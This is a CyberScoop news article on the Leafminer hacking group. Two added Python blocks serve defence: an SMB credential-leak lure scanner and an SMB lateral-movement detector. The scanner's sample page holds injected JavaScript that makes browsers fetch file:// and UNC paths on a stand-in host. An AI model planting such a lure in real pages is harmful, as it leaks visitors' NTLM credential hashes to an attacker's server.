Newly uncovered ‘Leafminer’ hacking group hitting wide array of Middle Eastern targets

The newly uncovered group uses a mix of custom and publicly available malware tools to breach targets in order to steal data.
A picture of Riyadh, Saudi Arabia. The country was one of many attacked by Leafminer. (Getty/PhotoMosh)

A newly uncovered hacking group has breached a number of critical infrastructure and government organizations in the Middle East with a mixture of publicly available and custom-built tools, according to new research from cybersecurity giant Symantec.

Dubbed Leafminer by the company, the group has infiltrated a number of organizations in countries such as Azerbaijan, Israel, Lebanon and Saudi Arabia, with a variety of intrusion techniques. Researchers observed the group using watering hole websites, vulnerability scans and brute-force login attempts for the purposes of data theft.

Symantec researchers categorized the group as “highly active,” conducting various operations since early 2017. The group targeted a wide range of sectors, including energy, government, finance and telecommunications.

According to Vikram Thakur, Symantec’s technical director, the group was active up until publication of the company’s research.


“Their servers are very much still up,” Thakur told CyberScoop.

The group is particularly adept at adopting techniques from research reports and conference presentations that have been made public on the internet. It also uses EternalBlue, the exploit for a flaw in the SMBv1 implementation of Microsoft's Server Message Block protocol (patched by Microsoft in March 2017 as MS17-010). The exploit became public in the Shadow Brokers leak, which gave anyone access to a large library of hacking tools used by the National Security Agency.

Symantec’s blog post links Leafminer to actors based in Iran. However, Thakur told CyberScoop that researchers have no other evidence of the group’s motive or if it is working on behalf of the government.

“We have no idea if they are doing this on their own accord or at the behest of somebody else,” he said.

Ambitious, But Brazen


In the course of the investigation, Symantec researchers found a download URL for a malware payload used in one of the attacks. That URL led to a compromised web server hosted on an Azerbaijani government website. The group has been using that server to distribute malware, payloads and tools among its members.

“Clearly the attackers have compromised that server and have been using it as their staging server,” Thakur told CyberScoop.

Since that discovery, Symantec researchers have been examining Leafminer's tools as the attackers swap files in and out of the server.

“I don’t think Leafminer thought about anyone else having public access,” Thakur said. “That’s the reason that every time they upload files, we’re able to go to the website, look at their web shells, take the files and examine them ourselves.”

Given the ease with which Symantec researchers came across the tools, Thakur wouldn't rule out the possibility that Leafminer has other, better-hidden staging servers. However, his team has yet to uncover any such setup.


Living off the Land

Researchers chronicle in the blog post how Leafminer has combined publicly available tools, tactics and procedures with its own custom malware.

One such instance is OrangeTeghal, a reworked version of the widely used post-exploitation credential-dumping tool Mimikatz. Leafminer modified Mimikatz's code to apply a technique (Process Doppelgänging) revealed in a presentation at the 2017 Black Hat Europe security conference, so that security tools that would have recognized the original Mimikatz code no longer detected it.

Additionally, the group used a watering hole technique in which JavaScript injected into a compromised website made visitors' Windows browsers request a resource over SMB, causing the client to leak its NTLM credential hash to a server the attackers controlled. This technique was similar to one used by Dragonfly, a well-resourced hacking group with ties to Russia that has targeted U.S. and European energy companies in a campaign stretching back to 2015.
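As an added example (not code from the article or from Symantec's research), here is a small scanner for the watering-hole pattern described above: it looks through a page's markup and inline scripts for `file://` URLs with a remote host and for UNC paths (`\\host\share`), either of which makes a Windows browser open an SMB connection and hand the remote server an NTLM challenge-response. The sample page and the host name `assets-cdn.example` are constructed for this demo.

```python
"""
Scanner for SMB credential-leak lures in web content (added example, not the
article's or Symantec's code). It flags file:// URLs with a non-empty host and
UNC paths, both of which trigger an outbound SMB connection from a Windows
client and leak an NTLM hash. The sample page below is constructed.
"""
import re
from typing import Dict, List, Sequence

# Constructed sample: a normal page with one injected <script> block.
SAMPLE_PAGE = r"""
<html><head><title>Ministry news</title>
<script src="/js/app.js"></script>
</head><body>
<img src="/images/logo.png">
<script>
  // injected: forces an SMB fetch from a Windows visitor
  var i = document.createElement("img");
  i.src = "file://assets-cdn.example/share/pixel.png";
  document.body.appendChild(i);
  document.write('<img src="\\\\assets-cdn.example\\share\\p.gif">');
</script>
</body></html>
"""

# file:// with a host part. file:///C:/... has an empty host (purely local) and
# is deliberately not matched, because it does not reach the network.
FILE_URL = re.compile(r'file://(?P<host>[A-Za-z0-9.\-]+)/(?P<path>[^"\'\s>]*)', re.I)

# UNC path: two or more leading backslashes (a JS string literal doubles them),
# then a host and a share name.
UNC_PATH = re.compile(r'\\{2,}(?P<host>[A-Za-z0-9.\-]+)\\+(?P<share>[A-Za-z0-9_$.\-]+)')


def find_smb_lures(html: str) -> List[Dict[str, str]]:
    """Return every reference in the page that would cause an SMB fetch."""
    findings: List[Dict[str, str]] = []
    for m in FILE_URL.finditer(html):
        findings.append({"kind": "file-url", "host": m.group("host"), "ref": m.group(0)})
    for m in UNC_PATH.finditer(html):
        findings.append({"kind": "unc-path", "host": m.group("host"), "ref": m.group(0)})
    return findings


def external_smb_hosts(html: str, allowed_hosts: Sequence[str] = ()) -> List[str]:
    """Hosts a Windows visitor would authenticate to over SMB, minus an allowlist
    of internal file servers the site is legitimately expected to reference."""
    allowed = {a.lower() for a in allowed_hosts}
    hosts = {f["host"].lower() for f in find_smb_lures(html)}
    return sorted(h for h in hosts if h not in allowed)


if __name__ == "__main__":
    for finding in find_smb_lures(SAMPLE_PAGE):
        print(finding)
    print("SMB lure hosts:", external_smb_hosts(SAMPLE_PAGE))
```

Run it over pages fetched by your web proxy or over a site's own templates; any host reported by `external_smb_hosts` that is not an internal file server deserves a look. The structural fix is independent of the scanner: block outbound TCP 445 and 139 at the network edge so that browsers cannot reach attacker-controlled SMB servers at all, and restrict outbound NTLM with the Windows "Network security: Restrict NTLM" policies.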

Once inside a victim's systems, the group used EternalBlue to move laterally within the target network and between target networks and its compromised staging servers.
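EternalBlue exploits the SMBv1 service on TCP port 445, so a host that suddenly opens SMB connections to many internal peers within a short window is a useful signal of this kind of lateral movement. The detector below is an added example (not the article's or Symantec's code): it parses a constructed connection-log format of `timestamp src dst dport action`, counts distinct port-445 destinations per source over a sliding time window, and reports sources whose peak fan-out reaches a threshold. The log lines and addresses are constructed for the demo.

```python
"""
SMB lateral-movement fan-out detector (added example, not the article's or
Symantec's code). Reads connection-log lines of the constructed form
"timestamp src dst dport action" and alerts on sources that reach many distinct
hosts on TCP 445 within a sliding window.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample: one workstation sweeps twelve peers on 445 in six seconds,
# another touches two file servers fourteen minutes apart, and one 443 line is noise.
SAMPLE_LOG = """\
2018-07-25T09:00:01 10.1.2.15 10.1.2.9 445 allow
2018-07-25T09:00:02 10.1.2.15 10.1.2.10 445 allow
2018-07-25T09:00:02 10.1.2.15 10.1.2.11 445 allow
2018-07-25T09:00:03 10.1.2.15 10.1.2.12 445 allow
2018-07-25T09:00:03 10.1.2.15 10.1.2.13 445 allow
2018-07-25T09:00:04 10.1.2.15 10.1.2.14 445 allow
2018-07-25T09:00:05 10.1.2.15 10.1.2.16 445 allow
2018-07-25T09:00:05 10.1.2.15 10.1.2.17 445 allow
2018-07-25T09:00:06 10.1.2.15 10.1.2.18 445 allow
2018-07-25T09:00:06 10.1.2.15 10.1.2.19 445 allow
2018-07-25T09:00:07 10.1.2.15 10.1.2.20 445 allow
2018-07-25T09:00:07 10.1.2.15 10.1.2.21 445 allow
2018-07-25T09:01:00 10.1.2.30 10.1.2.5 445 allow
2018-07-25T09:15:00 10.1.2.30 10.1.2.6 445 allow
2018-07-25T09:00:10 10.1.2.15 10.1.2.9 443 allow
"""


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one constructed-format log line; return None for malformed lines."""
    fields = line.split()
    if len(fields) != 5:
        return None
    try:
        return {
            "ts": datetime.fromisoformat(fields[0]),
            "src": fields[1],
            "dst": fields[2],
            "dport": int(fields[3]),
            "action": fields[4],
        }
    except ValueError:
        return None


def smb_fanout(lines: Iterable[str],
               window: timedelta = timedelta(seconds=60),
               threshold: int = 10) -> Dict[str, int]:
    """Map each alerting source IP to its peak number of distinct port-445
    destinations seen inside any window of the given length."""
    by_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for rec in (parse_line(l) for l in lines):
        if rec and rec["dport"] == 445:
            by_src[rec["src"]].append((rec["ts"], rec["dst"]))

    alerts: Dict[str, int] = {}
    for src, events in by_src.items():
        events.sort()
        in_window: Counter = Counter()   # distinct destinations currently in window
        left = 0
        peak = 0
        for ts, dst in events:
            in_window[dst] += 1
            # Slide the left edge forward until the window fits.
            while ts - events[left][0] > window:
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts[src] = peak
    return alerts


if __name__ == "__main__":
    for src, peak in smb_fanout(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {src}: {peak} distinct SMB peers within 60s")
```

Tune the window and threshold to what your own workstations normally do; a domain controller or backup server legitimately talks SMB to many hosts and belongs on an allowlist. Detection is the fallback: the primary controls against EternalBlue are applying MS17-010 and disabling SMBv1 (on a server, `Get-SmbServerConfiguration | Select EnableSMB1Protocol` in PowerShell shows whether it is still on).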


Thakur told CyberScoop that this mix of custom and publicly available toolsets, a practice Symantec refers to as "living off the land" (using tools that are already present on a victim's systems or freely available, so that malicious activity blends in with legitimate administration), is a growing trend among hacking groups.

“There are very few attacking groups that continue to use custom malware exclusively,” he told CyberScoop. “The advantages of using publicly available tools not only help the attackers in flying under the radar, but also prevent the security industry and government agencies from attribution.”

Still Online?

While Thakur says the group is still active, he expects that within a day or two the compromised staging servers, which belong to various victims, will be cleaned up. Those fixes would cut Leafminer off from the toolsets hosted there.

Even with those remediation efforts, Thakur expects the group to stay active.


“The next step for us is to watch to see if Leafminer goes outside of these countries and attacks outside of these verticals,” he said. “We expect these attacks to continue.”

Written by Greg Otto

Greg Otto is Editor-in-Chief of CyberScoop, overseeing all editorial content for the website. Greg has led cybersecurity coverage that has won various awards, including accolades from the Society of Professional Journalists and the American Society of Business Publication Editors. Prior to joining Scoop News Group, Greg worked for the Washington Business Journal, U.S. News & World Report and WTOP Radio. He has a degree in broadcast journalism from Temple University.